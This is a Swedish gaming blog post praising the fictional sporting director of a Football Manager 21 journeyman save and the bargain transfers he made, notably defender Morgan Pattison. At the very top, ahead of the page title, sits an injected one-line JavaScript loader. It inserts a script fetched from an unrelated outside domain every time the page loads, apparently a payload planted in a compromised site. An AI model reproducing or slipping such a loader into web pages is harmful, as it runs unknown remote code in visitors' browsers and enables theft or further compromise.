;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); En hyllning till sportchefen!! – FMSweden
Meny Stäng

En hyllning till sportchefen!!

I hela våran Journeymansave, har Danne Sportchef trollat med värvningar, ledare och arenor. Det är nu dags att ge honom en liten shoutout i dagens AW. Daniel Nilsson, en modern trollkarl på FM21. 

I saven går det fortsatt bra. RBL vann sin Champions League-grupp innehållandes Juventus, Tottenham och Anderlecht. Matías Antúnez och Djordje Fratrovic fortsätter ösa in mål och målvakten Dejan Nikolic har dragit åt sig intresse från såväl Man City som Barcelona. Nyförvärv som Mauro Píriz och Jorge Palmieri har tagit sig in i truppen fint och i ligan leder vi efter 17 spelade omgångar, fem poäng före Borussia Dortmund.

Det är dock inte resultaten vi ska framhäva i dagens AW. Det har varit mycket fokus på Devran NH Bagis under resans gång och inte så mycket på hans överordnade Daniel Nilsson.

Danne som sköter allt runt klubbval, rekryteringar och arenafrågor, har gjort ett hästjobb i det tysta. Flera av hans värvningar genom åren har tagit kliv in i fotbollens absoluta finrum.

Det har varit spelare till Raith, Aberdeen, Standard Liege och RBL.

Målvakten Aaron Chafer som kom till Raith Rovers gratis, för att senare säljas till Man United för 110M kr. Det har fortsatt med en målis till, Joe France, som dök upp i Aberdeen för 100t kr från TNS i Wales. Han är nu i Bournemouth och värderas till 100M kr.

Det finns spelare i Chelsea, Fiorentina, Marseille, West Ham och Leicester. Spelare som köpts in för en spottstyver och sen gått vidare till större uppdrag.

Dock finns det ingen som gjort resan som Morgan Pattison gjort. Mittbacken köptes för 150t kr från den väldigt underskattade plantskolan The New Saints i Wales. Just det, samma klubb som Joe France fostrades i.

Pattison värvades till Aberdeen, där han snabbt blev en publikfavorit och sedermera kapten för laget som vann trippeln i Skottland. Han följde med Bagis till Standard Liége och blev snabbt en nyckelfigur även i det belgiska klubbygget. Efter en rad titlar i Belgien, blev Bagis sen tränare i RB Leipzig och Danne försökte få med Pattison även dit. Då var han för dyr, men i ett senare fönster visade det sig att Pattison gick att få loss för den blygsamma summan 600M kr.

Nu är Pattison vital i det RBL, som tagit över tronen från Bayern München och ska försöka erövra Europa. Han är bofast i det engelska landslaget och ska spela mästerskap för England.

En gång i tiden sprang han runt på det torftiga plastgräset i Oewstry på den engelska sidan. Klubben TNS har dock sitt säte i Llansantffraid-ym-Mechain på den walesiska sidan.

Morgan Pattison har dock sitt säte grundligt rotat i Leipzig just nu och frågan är om hans betydelse för Devran NH Bagis nånsin kommer kunna värderas.

Trevlig helg kamrater

SKÅL

Tobbe

Please wait...

Liknande Inlägg

1 kommentar

Lämna ett svar